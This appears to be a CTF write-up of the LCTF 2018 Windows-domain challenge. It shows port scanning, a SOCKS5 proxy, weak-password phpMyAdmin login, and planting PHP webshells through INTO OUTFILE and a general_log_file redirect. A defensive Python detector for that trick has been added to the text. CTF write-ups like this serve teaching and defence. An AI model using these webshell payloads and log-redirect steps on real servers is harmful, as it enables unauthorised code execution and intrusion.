question
Challenge description:
The Windows domain environment is hard to configure permissions for, so please go easy on it, masters, and don't wreck the box.
Only 0-20 of the C segment is in use; there is no need to scan 21-255, and only common ports are open.
web.lctf.com has a domain user web.lctf.com\buguake whose password is the local administrator password of 172.21.0.8.
188.131.161.90
nmap scan first. Recent web pentest challenges like to hand out a socks5 proxy.
➜ ubuntu nmap -p 1000-1100 188.131.161.90
Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-20 00:50 CST
Nmap scan report for 188.131.161.90
Host is up (0.048s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
1083/tcp open ansoft-lm-1
1084/tcp open ansoft-lm-2
1088/tcp open cplscrambler-al
1089/tcp open ff-annunc
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
Go through the proxy:
export all_proxy=socks5://188.131.161.90:1083
Visit http://172.21.0.1
Hello World
Try http://172.21.0.1/phpinfo.php
Found it is phpStudy; try logging into phpMyAdmin with weak passwords:
root
root phpmyadmin
root root
Use general_log to drop a webshell. First attempt, writing directly with INTO OUTFILE:
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'c:/phpStudy/PHPTutorial/WWW/cmd.php'
Result:
#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
secure_file_priv blocks file writes, so change approach and redirect the general log file into the web root instead:
set global general_log='on';
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/xyzz1.php';
SELECT '<?php assert($_GET["cmd"]);?>';
Got a webshell.
Visit it:
http://172.21.0.8/xyzz1.php?cmd=system(%22whoami%22)
C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
364 Init DB mysql
364 Query SELECT 'pupiles-pc\administrator '
364 Query SHOW TABLE STATUS FROM `mysql` LIKE 'general\_log%'
364 Query SELECT COUNT(*) FROM `mysql`.`general_log`
364 Query SHOW CREATE TABLE `mysql`.`general_log`
364 Quit
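A defender-side check for the general_log trick used above, added here as an example and not part of the original writeup: it parses MySQL general-log lines in the layout shown in the output above and flags the log file being pointed into a web root, INTO OUTFILE writes into a web root, and PHP tags inside query text. The web-root list and the sample log lines are constructed for the demo.

```python
"""Detect MySQL general_log abuse: the log file redirected into a web root,
or PHP code passed through queries so it lands in a web-served file."""
import re

# Constructed sample of MySQL general-log lines ("<id> <command> <argument>"),
# not taken from the challenge box.
SAMPLE_LOG = """\
364 Init DB mysql
364 Query SET global general_log='on'
364 Query SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/x.php'
364 Query SELECT '<?php echo "x"; ?>'
365 Query SELECT COUNT(*) FROM `mysql`.`general_log`
365 Query SELECT 'report' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/r.txt'
366 Quit
"""

# Directories the web server serves from; hypothetical values for this demo.
WEB_ROOTS = ("c:/phpstudy/phptutorial/www", "/var/www")

ENTRY_RE = re.compile(r"^(\d+)\s+(\w+)\s*(.*)$")
LOG_FILE_RE = re.compile(r"general_log_file\s*=\s*'([^']+)'", re.I)
OUTFILE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s+'([^']+)'", re.I)


def in_web_root(path):
    """Normalise slashes and case, then test against the web-root list."""
    p = path.replace("\\", "/").lower()
    return any(p.startswith(root) for root in WEB_ROOTS)


def scan_general_log(text):
    """Return (connection_id, reason, argument) for each suspicious query."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m or m.group(2) != "Query":
            continue  # only Query entries carry SQL text
        cid, _, arg = m.groups()
        lf = LOG_FILE_RE.search(arg)
        if lf and in_web_root(lf.group(1)):
            findings.append((cid, "general_log_file moved into web root", lf.group(1)))
        of = OUTFILE_RE.search(arg)
        if of and in_web_root(of.group(1)):
            findings.append((cid, "file written into web root", of.group(1)))
        if "<?php" in arg.lower() or "<?=" in arg:
            findings.append((cid, "PHP tag inside query text", arg))
    return findings


if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

Pair this with a read-only mysql account for the web app and a fixed `general_log_file` outside any served directory, so the redirect cannot be issued in the first place.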
Emmm, the website is closed. Give up!
According to Nu1L's writeup, the next steps are MS17-010 and MS14-068.
Nu1L's writeup: https://xz.aliyun.com/t/3341#toc-18